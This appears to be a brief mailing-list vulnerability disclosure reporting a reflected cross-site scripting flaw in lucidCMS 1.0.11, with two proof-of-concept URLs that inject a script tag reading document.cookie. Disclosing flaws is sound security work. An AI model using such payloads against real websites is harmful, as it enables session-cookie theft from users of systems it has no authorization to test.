<<< Date Index >>>     <<< Thread Index >>>

lucidCMS 1.0.11 is susceptible to a cross site scripting attack



[Description]:
lucidCMS is a simple and flexible content management system for the individual 
or organization that wishes to manage a collection of webpages without the 
overhead and complexity of other available
"community" CMS options.

[version]:lucidCMS 1.0.11

[vendor]:www.lucidcms.net

[Vulnerability]: cross site script


[exploit]:
http://[host]/[cms]/index.php?<script>alert(document.cookie);</script>
http://[host]/[cms]/?<script>alert(document.cookie);</script>


.......[X1NG]..........
X1ngBox <at/> Gmail Com